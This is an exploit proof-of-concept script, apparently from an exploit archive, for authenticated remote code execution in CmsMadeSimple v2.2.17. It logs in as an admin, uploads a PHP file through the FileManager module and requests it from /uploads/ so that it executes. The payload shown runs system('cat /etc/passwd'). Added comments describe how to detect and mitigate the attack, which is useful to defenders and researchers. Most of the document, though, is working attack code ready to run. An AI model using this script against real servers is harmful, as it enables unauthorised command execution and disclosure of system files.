
#Exploit Title: CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)
#Application: CmsMadeSimple
#Version: v2.2.17
#Bugs: Remote Code Execution(RCE)
#Technology: PHP
#Vendor URL: https://www.cmsmadesimple.org/
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
#Date of found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

"""Proof of concept for the CmsMadeSimple v2.2.17 authenticated file-upload RCE.

What the script does, in order:
  1. POSTs admin credentials to admin/login.php and keeps the resulting
     session cookies.
  2. POSTs a local file to admin/moduleinterface.php through the FileManager
     module's upload action (``mact=FileManager,m1_,upload,0``).
  3. GETs the file back from /uploads/<name> and prints the response body,
     i.e. whatever the server returned when serving the uploaded file.

Defender's notes (derived from the requests this script makes):
  * The chain needs a valid admin login first; it is a post-authentication
    issue, so admin credential hygiene and login monitoring come first.
  * The observable pattern is a multipart POST to moduleinterface.php carrying
    that ``mact`` value, followed by an anonymous GET for the same file name
    under /uploads/.
  * The impact depends on the web server executing the uploaded file instead
    of serving it as data; preventing script execution inside the uploads
    directory and restricting the extensions FileManager accepts would remove
    the impact independently of the CMS version.
"""

import requests

# Target host is hard-coded; every URL below is relative to localhost.
login_url = 'http://localhost/admin/login.php'

# Credentials are read interactively; see the module docstring — the whole
# chain only works with an account that can log in to /admin.
username=input('username = ')
password=input('password = ')

upload_url = 'http://localhost/admin/moduleinterface.php'

# The same string is used twice: as the local file to read, and later as the
# file name appended to /uploads/ in the final GET.
file_path = input("please phar file name but file must same directory with python file and file content : <?php echo system('cat /etc/passwd') ?> : ")
#phar file content """"<?php echo system('cat /etc/passwd') ?>"""""

login_data = {
    'username': username,
    'password': password,
    'loginsubmit': 'Submit'
}

# A Session is used so cookies set by login.php are sent on the upload request.
session = requests.Session()
response = session.post(login_url, data=login_data)

# NOTE: only the HTTP status is inspected, not the response content, so a 200
# here does not by itself show that the credentials were accepted.
if response.status_code == 200:
    print('Login account')
else:
    print('Login promlem.')
    exit()

# The file handle is never closed explicitly; it stays open until the
# interpreter exits.
files = {
    'm1_files[]': open(file_path, 'rb')
}

data = {
    'mact': 'FileManager,m1_,upload,0',  # FileManager module, instance "m1_", action "upload"
    '__c': session.cookies['__c'],       # '__c' cookie from the login session, resent as a form field; KeyError if it was never set
    'disable_buffer': '1'
}

response = session.post(upload_url, files=files, data=data)

# As with the login, a 200 status is taken as success without checking the body.
if response.status_code == 200:
    print('file upload')
    rce_url=f"http://localhost/uploads/{file_path}"
    # Plain requests.get, not the session: the uploaded file is fetched as an
    # anonymous visitor would, and the body is printed verbatim.
    rce=requests.get(rce_url)
    print(rce.text)
else:
    print('file not upload')